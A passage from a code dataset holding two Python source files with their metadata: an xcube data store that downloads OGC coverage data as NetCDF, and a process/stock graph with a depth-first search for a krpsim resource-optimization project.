[('f', 'netcdf')]\n\n response = requests.get(\n self._get_coverage_link(data_id),\n params=dict(ogc_params)\n )\n\n if response.status_code == 200:\n temp_subdir = tempfile.mkdtemp(dir=self._tempdir)\n filepath = os.path.join(temp_subdir, 'dataset.nc')\n with open(filepath, 'bw') as fh:\n fh.write(response.content)\n dataset = xr.open_dataset(filepath, engine='netcdf4')\n\n if save_zarr_to:\n dataset.to_zarr(save_zarr_to)\n return dataset\n else:\n r = response.json()\n if 'error' in r:\n e = r['error']\n message = e['message']\n else:\n message = response.content\n raise DataStoreError(\n f'Error opening data: {response.status_code}: {message}'\n )\n\n def get_data_ids(self,\n data_type: DataTypeLike = None,\n include_attrs: Container[str] = None) -> \\\n Union[Iterator[str], Iterator[Tuple[str, Dict[str, Any]]]]:\n response = requests.get(f'{self._server_url}/collections')\n collections = response.json()['collections']\n return (collection['id'] for collection in collections)\n\n def has_data(self, data_id: str, data_type: Optional[str] = None) \\\n -> bool:\n return data_id in self.get_data_ids(data_type)\n\n @staticmethod\n def _convert_store_param(kvp: Tuple[str, Any]) -> Tuple[str, str]:\n key, value = kvp\n if key in {'scale_factor', 'subset_crs', 'bbox_crs', 'crs'}:\n # Pass through, converting underscores to hyphens if present\n return key.replace('_', '-'), value\n elif key == 'datetime':\n if len(value) == 1:\n return 'datetime', value\n elif len(value) == 2:\n return 'datetime', '/'.join(value)\n else:\n raise ValueError(f'Invalid datetime: \"{value}\"')\n elif key == 'subset':\n return 'subset', OGCCovDataOpener._subset_dict_to_string(value)\n elif key == 'bbox':\n x0, y0, x1, y1 = value\n return 'bbox', f'{x0},{y0},{x1},{y1}'\n elif key == 'properties':\n return 'properties', ','.join(value)\n elif key in {'scale_axes', 'scale_size'}:\n return (\n key.replace('_', '-'),\n ','.join([f'{ax}({v})' for ax, v in value.items()])\n )\n else:\n raise ValueError(f'Unknown parameter \"{key}\"')\n\n @staticmethod\n def _subset_dict_to_string(subset_dict: dict[str, Any]) -> str:\n parts = []\n for axis, range_ in subset_dict.items():\n if (isinstance(range_, collections.abc.Sequence)\n and not isinstance(range_, str)):\n if len(range_) == 1:\n parts.append(f'{axis}({range_[0]})')\n elif len(range_) == 2:\n range_string = ':'.join(\n ['*' if x is None else f'{x}' for x in range_]\n )\n parts.append(f'{axis}({range_string})')\n else:\n raise ValueError(\n f'Invalid subset range {range_} for axis {axis}'\n )\n else:\n parts.append(f'{axis}({str(range_)})')\n return ','.join(parts)\n\n def _create_empty_dataset(self, data_id, open_params: dict) -> xr.Dataset:\n \"\"\"Make a dataset with space and time dimensions but no data variables\n\n :param open_params: opener parameters\n :return: a dataset with the spatial and temporal dimensions given in\n the supplied parameters and no data variables\n \"\"\"\n\n store = OGCCovDataStore()\n data_descriptor = store.describe_data(data_id)\n bbox = open_params.get('bbox', data_descriptor.bbox)\n spatial_res = open_params.get('spatial_res',\n data_descriptor.spatial_res)\n # arange returns a half-open range, so we add *almost* a whole\n # spatial_res to the upper limit to make sure that it's included.\n lons = np.arange(bbox[0], bbox[2] + (spatial_res * 0.99), spatial_res)\n lats = np.arange(bbox[1], bbox[3] + (spatial_res * 0.99), spatial_res)\n\n time_range = open_params['time_range']\n times = self._create_time_range(time_range[0], time_range[1],\n 
data_descriptor.time_period)\n return xr.Dataset({}, coords={'time': times, 'lat': lats, 'lon': lons})\n\n @staticmethod\n def _create_time_range(t_start: str, t_end: str, t_interval: str):\n \"\"\"Turn a start, end, and time interval into an array of datetime64s\n\n The array will contain times spaced at t_interval.\n If the time from start to end is not an exact multiple of the\n specified interval, the range will extend beyond t_end by a fraction\n of an interval.\n\n :param t_start: start of time range (inclusive) (ISO 8601)\n :param t_end: end of time range (inclusive) (ISO 8601)\n :param t_interval: time interval (format e.g. \"2W\", \"3M\" \"1Y\")\n :return: a NumPy array of datetime64 data from t_start to t_end with\n an interval of t_period. If t_period is in months or years,\n t_start and t_end will be rounded (down and up respectively)\n to the nearest whole month.\n \"\"\"\n dt_start = dateutil.parser.isoparse(t_start)\n dt_end = datetime.datetime.now() if t_end is None \\\n else dateutil.parser.isoparse(t_end)\n period_number, period_unit = \\\n OGCCovDataOpener._parse_time_period(t_interval)\n timedelta = np.timedelta64(period_number, period_unit)\n relativedelta = OGCCovDataOpener._period_to_relativedelta(\n period_number, period_unit\n )\n one_microsecond = dateutil.relativedelta.relativedelta(microseconds=1)\n # Months and years can be of variable length, so we need to reduce the\n # resolution of the start and end appropriately if the aggregation\n # period is in one of these units.\n if period_unit in 'MY':\n range_start = dt_start.strftime('%Y-%m')\n range_end = (dt_end + relativedelta - one_microsecond). \\\n strftime('%Y-%m')\n else:\n range_start = dt_start.isoformat()\n range_end = (dt_end + relativedelta - one_microsecond).isoformat()\n\n return np.arange(range_start, range_end, timedelta,\n dtype=f'datetime64')\n\n @staticmethod\n def _parse_time_period(specifier: str) -> Tuple[int, str]:\n \"\"\"Convert a time period (e.g. '10D', 'Y') to a NumPy timedelta\"\"\"\n time_match = re.match(r'^(\\d+)([hmsDWMY])$',\n specifier)\n time_number_str = time_match.group(1)\n time_number = 1 if time_number_str == '' else int(time_number_str)\n time_unit = time_match.group(2)\n return time_number, time_unit\n\n @staticmethod\n def _period_to_relativedelta(number: int, unit: str) \\\n -> dateutil.relativedelta:\n conversion = dict(Y='years', M='months', D='days', W='weeks',\n h='hours', m='minutes', s='seconds')\n return dateutil.relativedelta. 
\\\n relativedelta(**{conversion[unit]: number})\n\n def _normalize_dataset(self, dataset):\n dataset = xcube.core.normalize.normalize_dataset(dataset)\n\n # These steps should be taken care of by the core normalizer now.\n # TODO: check that they are.\n # dataset = dataset.rename_dims({\n # 'longitude': 'lon',\n # 'latitude': 'lat'\n # })\n # dataset = dataset.rename_vars({'longitude': 'lon', 'latitude': 'lat'})\n # dataset.transpose('time', ..., 'lat', 'lon')\n\n dataset.coords['time'].attrs['standard_name'] = 'time'\n # Correct units not entirely clear: cubespec document says\n # degrees_north / degrees_east for WGS84 Schema, but SH Plugin\n # had decimal_degrees.\n if 'lat' in dataset.coords:\n dataset.coords['lat'].attrs['standard_name'] = 'latitude'\n dataset.coords['lat'].attrs['units'] = 'degrees_north'\n if 'lon' in dataset.coords:\n dataset.coords['lon'].attrs['standard_name'] = 'longitude'\n dataset.coords['lon'].attrs['units'] = 'degrees_east'\n\n # TODO: Temporal coordinate variables MUST have units, standard_name,\n # and any others. standard_name MUST be \"time\", units MUST have\n # format \" since \", where datetime must have\n # ISO-format.\n\n if self._normalize_names:\n rename_dict = {}\n for name in dataset.data_vars.keys():\n normalized_name = re.sub(r'\\W|^(?=\\d)', '_', str(name))\n if name != normalized_name:\n rename_dict[name] = normalized_name\n dataset_renamed = dataset.rename_vars(rename_dict)\n return dataset_renamed\n else:\n return dataset\n\n def _assert_valid_data_id(self, data_id: str,\n allow_none: bool = False) -> None:\n if (data_id is None and not allow_none) or not self.has_data(data_id):\n raise ValueError(f'Unknown data id \"{data_id}\"')\n\n def _create_temporary_directory(self):\n # Create a temporary directory to hold downloaded files and a hook to\n # delete it when the interpreter exits. xarray.open reads data lazily\n # so we can't just delete the file after returning the Dataset. 
We\n # could also use weakref hooks to delete individual files when the\n # corresponding object is garbage collected, but even then the\n # directory is useful to group the files and offer an extra assurance\n # that they will be deleted.\n tempdir = tempfile.mkdtemp()\n\n def delete_tempdir():\n # This method is hard to unit test, so we exclude it from test\n # coverage reports.\n shutil.rmtree(tempdir, ignore_errors=True) # pragma: no cover\n\n atexit.register(delete_tempdir)\n self._tempdir = tempdir\n\n def _get_coverage_link(self, collection_id):\n links = self._get_collection_links(\n collection_id,\n {\n 'rel': {'coverage',\n 'http://www.opengis.net/def/rel/ogc/1.0/coverage'},\n 'type': {'netcdf', 'application/netcdf',\n 'application/x-netcdf'}\n }\n )\n if len(links) > 0:\n # If multiple coverage links available, use the first.\n return links[0]\n else:\n # Fall back to standard endpoint if none specified explicitly.\n return self._server_url + f'/{collection_id}/coverage'\n\n def _get_collection_links(self, collection_id: str,\n selectors: dict[str, Collection[str]]) -> \\\n list[str]:\n response = requests.get(\n f'{self._server_url}/collections/{collection_id}')\n collection = response.json()\n result = []\n for link in collection.get('links', []):\n if (all([link.get(prop) in selectors[prop] for prop in selectors])\n and 'href' in link):\n result.append(link['href'])\n print(result)\n return result\n\n\nclass OGCCovDataStore(DefaultSearchMixin, OGCCovDataOpener, DataStore):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n @classmethod\n def get_data_store_params_schema(cls) -> JsonObjectSchema:\n params = dict(\n normalize_names=JsonBooleanSchema(default=False)\n )\n\n store_params = dict(\n server_url=JsonStringSchema(),\n )\n\n params.update(store_params)\n return JsonObjectSchema(\n properties=params,\n required=None,\n additional_properties=False\n )\n\n @classmethod\n def get_data_types(cls) -> Tuple[str, ...]:\n return DATASET_TYPE.alias,\n\n def get_data_types_for_data(self, data_id: str) -> Tuple[str, ...]:\n self._assert_valid_data_id(data_id)\n return DATASET_TYPE.alias,\n\n def describe_data(self, data_id: str,\n data_type: Optional[str] = None) \\\n -> DatasetDescriptor:\n self._assert_valid_data_id(data_id)\n self._validate_data_type(data_type)\n\n return DatasetDescriptor(\n data_id=data_id,\n data_type=DATASET_TYPE,\n time_period=None, # str\n spatial_res=None, # float\n coords=None, # Mapping[str, 'VariableDescriptor'],\n data_vars=None, # Mapping[str, 'VariableDescriptor'],\n attrs=None, # Mapping[Hashable, any],\n open_params_schema=None, # JsonObjectSchema,\n **(self._domainset_params(data_id))\n )\n\n def _domainset_params(self, data_id: str) -> dict[str, Any]:\n params = {}\n domainset = requests.get(\n f'{self._server_url}/collections/{data_id}/coverage/domainset',\n params=dict(f='json')\n ).json()\n grid = domainset.get('generalGrid', {})\n params['dims'] = {}\n bbox = [None, None, None, None]\n for index, axis in enumerate(grid.get('axis', [])):\n label = axis.get('axisLabel', '?')\n params['dims'][label] = index\n if label in {'lon', 'longitude', 'x'}:\n bbox[0] = float(axis.get('lowerBound', '0'))\n bbox[2] = float(axis.get('upperBound', '0'))\n elif label in {'lat', 'latitude', 'y'}:\n bbox[1] = float(axis.get('lowerBound', '0'))\n bbox[3] = float(axis.get('upperBound', '0'))\n elif label in {'time', 't'}:\n try:\n params['time_range'] = tuple(\n datetime.datetime.fromisoformat(\n axis.get(bound)).strftime('%Y-%m-%d')\n for bound 
in ['lowerBound', 'upperBound'])\n except ValueError:\n # Ignore malformed timestamps\n pass\n params['bbox'] = None if None in bbox else tuple(bbox)\n params['crs'] = grid.get('srsName')\n return params\n\n # noinspection PyTypeChecker\n def search_data(self, data_type: Optional[DataTypeLike] = None,\n **search_params) \\\n -> Iterator[DataDescriptor]:\n self._validate_data_type(data_type)\n return super().search_data(data_type=data_type,\n **search_params)\n\n def get_data_opener_ids(self, data_id: Optional[str] = None,\n data_type: Optional[str] = None) \\\n -> Tuple[str, ...]:\n self._validate_data_type(data_type)\n self._assert_valid_data_id(data_id, allow_none=True)\n return OGCCOV_DATA_OPENER_ID,\n\n def get_open_data_params_schema(self, data_id: Optional[str] = None,\n opener_id: Optional[str] = None) \\\n -> JsonObjectSchema:\n # At present, there's only one opener ID available, so we do nothing\n # with it except to check that it was correct (or None).\n self._assert_valid_opener_id(opener_id)\n self._assert_valid_data_id(data_id, allow_none=True)\n return super().get_open_data_params_schema(data_id)\n\n def open_data(self, data_id: str, opener_id: Optional[str] = None,\n **open_params) -> xr.Dataset:\n self._assert_valid_opener_id(opener_id)\n self._assert_valid_data_id(data_id)\n return super().open_data(data_id, **open_params)\n\n ###########################################################################\n # Implementation helpers\n\n @staticmethod\n def _validate_data_type(data_type: DataTypeLike):\n if not OGCCovDataStore._is_data_type_satisfied(data_type):\n raise DataStoreError(\n f'Supplied data type {data_type!r} is not compatible'\n f' with \"{DATASET_TYPE!r}.\"'\n )\n\n @staticmethod\n def _is_data_type_satisfied(\n data_type: DataTypeLike) -> bool:\n # We expect all datasets to be available as cubes, so we simply check\n # against TYPE_SPECIFIER_CUBE.\n if data_type is None:\n return True\n return DATASET_TYPE.is_super_type_of(data_type)\n\n @staticmethod\n def _assert_valid_opener_id(opener_id):\n if opener_id is not None and opener_id != OGCCOV_DATA_OPENER_ID:\n raise DataStoreError(\n f'Data opener identifier must be \"{OGCCOV_DATA_OPENER_ID}\"'\n f'but got \"{opener_id}\"')\n", "repo_name": "dcs4cop/xcube-ogccov", "sub_path": "xcube_ogccov/store.py", "file_name": "store.py", "file_ext": "py", "file_size_in_byte": 20915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "xcube.core.store.DataOpener", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 51, "usage_type": "name"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 55, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonArraySchema", "line_number": 56, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 57, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 58, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 59, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonNumberSchema", "line_number": 60, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonArraySchema", "line_number": 62, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonArraySchema", "line_number": 63, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 64, "usage_type": "call"}, {"api_name": 
"xcube.util.jsonschema.JsonNumberSchema", "line_number": 66, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 69, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 72, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 75, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 78, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 81, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 85, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 52, "usage_type": "name"}, {"api_name": "xcube.util.undefined.UNDEFINED", "line_number": 105, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 114, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "xarray.open_dataset", "line_number": 124, "usage_type": "call"}, {"api_name": "xcube.core.store.DataStoreError", "line_number": 136, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 91, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Container", "line_number": 142, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 144, "usage_type": "call"}, {"api_name": "collections.abc", "line_number": 145, "usage_type": "name"}, {"api_name": "collections.abc", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 181, "usage_type": "name"}, {"api_name": "collections.abc.abc", "line_number": 184, "usage_type": "attribute"}, {"api_name": "collections.abc", "line_number": 184, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 217, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 222, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 201, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parser.isoparse", "line_number": 241, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 241, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 241, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 242, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parser.isoparse", "line_number": 243, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 243, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 243, "usage_type": "name"}, 
{"api_name": "numpy.timedelta64", "line_number": 246, "usage_type": "call"}, {"api_name": "dateutil.parser.relativedelta.relativedelta", "line_number": 250, "usage_type": "call"}, {"api_name": "dateutil.parser.relativedelta", "line_number": 250, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 250, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 262, "usage_type": "call"}, {"api_name": "re.match", "line_number": 268, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 266, "usage_type": "name"}, {"api_name": "dateutil.parser.relativedelta.relativedelta", "line_number": 280, "usage_type": "call"}, {"api_name": "dateutil.parser.relativedelta", "line_number": 280, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 280, "usage_type": "name"}, {"api_name": "dateutil.parser.relativedelta", "line_number": 277, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 277, "usage_type": "name"}, {"api_name": "xcube.core.normalize.core.normalize.normalize_dataset", "line_number": 284, "usage_type": "call"}, {"api_name": "xcube.core.normalize.core", "line_number": 284, "usage_type": "attribute"}, {"api_name": "xcube.core.normalize", "line_number": 284, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 314, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 335, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 340, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 342, "usage_type": "call"}, {"api_name": "typing.Collection", "line_number": 363, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 365, "usage_type": "call"}, {"api_name": "xcube.core.store.DefaultSearchMixin", "line_number": 377, "usage_type": "name"}, {"api_name": "xcube.core.store.DataStore", "line_number": 377, "usage_type": "name"}, {"api_name": "xcube.util.jsonschema.JsonBooleanSchema", "line_number": 385, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonStringSchema", "line_number": 389, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 393, "usage_type": "call"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 383, "usage_type": "name"}, {"api_name": "xcube.core.store.DATASET_TYPE.alias", "line_number": 401, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 400, "usage_type": "name"}, {"api_name": "xcube.core.store.DATASET_TYPE.alias", "line_number": 405, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 405, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 403, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 408, "usage_type": "name"}, {"api_name": "xcube.core.store.DatasetDescriptor", "line_number": 413, "usage_type": "call"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 415, "usage_type": "name"}, {"api_name": "xcube.core.store.DatasetDescriptor", "line_number": 409, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 427, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 446, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 446, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 425, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 457, "usage_type": 
"name"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 457, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 459, "usage_type": "name"}, {"api_name": "xcube.core.store.DataDescriptor", "line_number": 459, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 464, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 465, "usage_type": "name"}, {"api_name": "xcube_ogccov.constants.OGCCOV_DATA_OPENER_ID", "line_number": 469, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 466, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 471, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 472, "usage_type": "name"}, {"api_name": "xcube.util.jsonschema.JsonObjectSchema", "line_number": 473, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 480, "usage_type": "name"}, {"api_name": "xarray.Dataset", "line_number": 481, "usage_type": "attribute"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 490, "usage_type": "name"}, {"api_name": "xcube.core.store.DataStoreError", "line_number": 492, "usage_type": "call"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 494, "usage_type": "name"}, {"api_name": "xcube.core.store.DataTypeLike", "line_number": 499, "usage_type": "name"}, {"api_name": "xcube.core.store.DATASET_TYPE.is_super_type_of", "line_number": 504, "usage_type": "call"}, {"api_name": "xcube.core.store.DATASET_TYPE", "line_number": 504, "usage_type": "name"}, {"api_name": "xcube_ogccov.constants.OGCCOV_DATA_OPENER_ID", "line_number": 508, "usage_type": "name"}, {"api_name": "xcube.core.store.DataStoreError", "line_number": 509, "usage_type": "call"}, {"api_name": "xcube_ogccov.constants.OGCCOV_DATA_OPENER_ID", "line_number": 510, "usage_type": "name"}]} +{"seq_id": "4864705129", "text": "from math import ceil\nimport numpy as np\nfrom dataclasses import dataclass, field\nfrom typing import Any, TypeVar, Optional\nfrom copy import deepcopy\nimport itertools\n\nfrom krpsim.parsing import Process\n\n# Custom types\nT = TypeVar('T')\nMatrix = list[list[T]]\n\nCOLOR_BLUE = '\\033[38;5;74m'\nRESET_COLOR = '\\033[0m'\n\n@dataclass\nclass NodeElem:\n \"\"\"\n Wrapper around a process and the number of time it needs to be\n executed to produce enough stock for the parent process\n _name: name of process\n _times: number of times the process is needed to produce enough stock\n \"\"\"\n _name: str\n _times: int\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def times(self) -> int:\n return self._times\n\n @name.setter\n def name(self, value) -> None:\n self._name = value\n\n @times.setter\n def times(self, value) -> None:\n self._times = value\n\n def __str__(self) -> str:\n return f'[{self.name} * {self.times}]'\n \n\n\n@dataclass\nclass Node:\n \"\"\"\n Collection of processes and stock\n list: list of tuple of process names and their number of executions\n _stock: dict containing the state of the stock current node \n \"\"\"\n\n _process_list: list[NodeElem]\n _stock: dict[str, int]\n\n\n @property\n def process_list(self) -> dict[str, int]:\n return self._process_list\n\n @property\n def stock(self) -> dict[str, int]:\n return self._stock\n\n @process_list.setter\n def process_list(self, value) -> None:\n self._process_list = value\n\n @stock.setter\n def stock(self, value) -> None:\n self._stock = value\n\n def __str__(self) -> str:\n \n string: str = f'{COLOR_BLUE}Processes{RESET_COLOR}: '\n for process in 
self.process_list:\n string += f'({process.name} * {process.times}) '\n string += f'| {COLOR_BLUE}Stocks{RESET_COLOR}: '\n for name, qty in self.stock.items():\n if qty != 0:\n string += f'({name}: {qty}) '\n return string\n\n def __add__(self, other):\n return Node([*self.process_list, *other.process_list], self.stock)\n\n def __radd__(self, other):\n return self if other == 0 else self.__add__(other)\n\n @staticmethod\n def combinations(matrix: Matrix) -> Matrix:\n \"\"\"\n Get the combinations of elements in the matrix\n returns: matrix of combinations\n example: \n matrix = [[1, 2, 3], [4, 5], [6, 7]]\n Node.combinations(matrix)\n [[1, 4, 6],\n [1, 5, 6],\n [2, 4, 6],\n [2, 5, 6],\n [3, 4, 6],\n [3, 5, 6],\n [1, 4, 7],\n [1, 5, 7],\n [2, 4, 7],\n [2, 5, 7],\n [3, 4, 7],\n [3, 5, 7]])\n \"\"\"\n\n return np \\\n .array(np.meshgrid(*matrix)) \\\n .T \\\n .reshape(-1, len(matrix)) \\\n .tolist()\n\n\n\n@dataclass\nclass Graph:\n \"\"\"\n Class representing a graph of processes connected to each other by the stock they produce/need.\n _process: dict of processes.\n _stock: dict of stocks. dict[key: stock name, value: quantity]\n _optimize: name of stock to optimize\n _needs: dict of processes regrouped by the stock they need.\n \"\"\"\n _process: dict[str, Process]\n _stock: dict[str, int]\n _optimize: str\n _needs: dict[str, list[Process]] = field(default_factory=dict)\n _produces: dict[str, list[Process]] = field(default_factory=dict)\n _paths: list[list[Node]] = field(default_factory=list)\n\n @property\n def process(self) -> dict[str, Process]:\n return self._process\n \n @property\n def stock(self) -> dict[str, int]:\n return self._stock\n \n @property\n def optimize(self) -> int:\n return self._optimize\n \n @property\n def needs(self) -> dict[str, list]:\n return self._needs\n \n @property\n def produces(self) -> dict[str, list]:\n return self._produces\n \n @property\n def paths(self) -> list[list[Node]]:\n return self._paths\n \n @process.setter\n def process(self, value) -> None:\n self._process = value\n \n @stock.setter\n def stock(self, value) -> None:\n self._stock = value\n \n @optimize.setter\n def optimize(self, value) -> None:\n self._optimize = value\n \n @needs.setter\n def needs(self, value) -> None:\n self._needs = value\n \n @produces.setter\n def produces(self, value) -> None:\n self._produces = value\n \n @paths.setter\n def paths(self, value) -> None:\n self._paths = value\n\n def sort(self) -> None:\n \"\"\"\n Method that sorts processes by their needs and products\n \"\"\"\n for stock, process in self.needs.items():\n process.sort(key=lambda p: p.need[stock])\n for stock, process in self.produces.items():\n process.sort(key=lambda p: p.result[stock], reverse=True)\n\n def build(self) -> None:\n \"\"\"\n Method that builds a graph by regrouping and \n \"\"\"\n for process in self.process.values():\n for stock in process.need:\n self.needs.setdefault(stock, []).append(process)\n self.stock.setdefault(stock, 0)\n for stock in process.result:\n self.produces.setdefault(stock, []).append(process)\n self.stock.setdefault(stock, 0)\n\n def update_stocks(self, node: Node) -> None:\n for process in node.process_list:\n for need, qty in self.process[process.name].need.items():\n node.stock[need] -= qty\n return node\n\n def stocks_available(self, node: Node) -> Optional[bool]:\n dead_end = True\n available = True\n for node_elem in node.process_list:\n for need, qty in self.process[node_elem.name].need.items():\n if node.stock[need] <= 0 or qty < node.stock[need]:\n 
available = False\n else:\n dead_end = False\n return available if not dead_end else None\n \n def get_root(self) -> list[Node]:\n \"\"\"\n Get root nodes that produces the stock to optimize\n returns: a node with a list of process that produces the stock to optimize\n \"\"\"\n process_list: list[NodeElem] = [NodeElem(p.name, 1) for p in self.produces[self.optimize]]\n _node_list: list[Node] = [Node([process], deepcopy(self.stock)) for process in process_list]\n root: list[Node] = [self.update_stocks(node) for node in _node_list]\n return root\n\n def get_process_children(self, parent_process: NodeElem, stock: dict[str, int]) -> list[Node]:\n \"\"\"\n Get all possible nodes that produce stocks that is needed by parent\n returns: list of combinations of nodes that produces stocks needed by\n one of the process (parent) of the parent node\n \"\"\"\n matrices: Matrix = []\n for need, qty in self.process[parent_process.name].need.items():\n if stock.get(need, 1) >= qty:\n continue\n matrices.append([NodeElem(p.name, 1) for p in self.produces[need]])\n if not matrices:\n return []\n combinations = Node.combinations(matrices)\n return [Node(lst, deepcopy(stock)) for lst in combinations]\n\n def get_children(self, parent: Node) -> list[Node]:\n \"\"\"\n Get a combination of all possible needed process as nodes\n parent: current node of processes\n returns: list of combinations of nodes that produces stocks needed by\n all the processes in the parent node\n \"\"\"\n nodes_lists: Matrix = [self.get_process_children(process, parent.stock) for process in parent.process_list]\n nodes_combinations: Matrix = Node.combinations(nodes_lists)\n _children: list[Node] = [sum(nodes) for nodes in nodes_combinations]\n children: list[Node] = [self.update_stocks(node) for node in _children]\n return children\n \n def depth_first_search(self, current: Node, path: list[Node]) -> None:\n \"\"\"\n Performs DFS to find every sequence of process that will be stored in self.paths\n current: the current node to explore\n \"\"\"\n path.append(current)\n for child in self.get_children(current):\n path_found = self.stocks_available(child)\n if path_found == True:\n path.append(child)\n return self.paths.append(path)\n elif path_found == False:\n return self.depth_first_search(child, path)\n else:\n return None\n return None\n\n def start_dfs(self) -> None:\n root = self.get_root()\n for node in root:\n self.depth_first_search(node, [])", "repo_name": "arlaine4/Krp", "sub_path": "src/krpsim/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 8777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.TypeVar", "line_number": 11, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 117, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 49, "usage_type": "name"}, {"api_name": "krpsim.parsing.Process", "line_number": 133, "usage_type": "name"}, {"api_name": "krpsim.parsing.Process", "line_number": 136, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 136, "usage_type": "call"}, {"api_name": "krpsim.parsing.Process", "line_number": 137, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 137, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 138, "usage_type": "call"},
